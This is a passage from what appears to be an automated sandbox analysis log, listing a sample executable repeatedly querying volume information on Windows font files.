          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
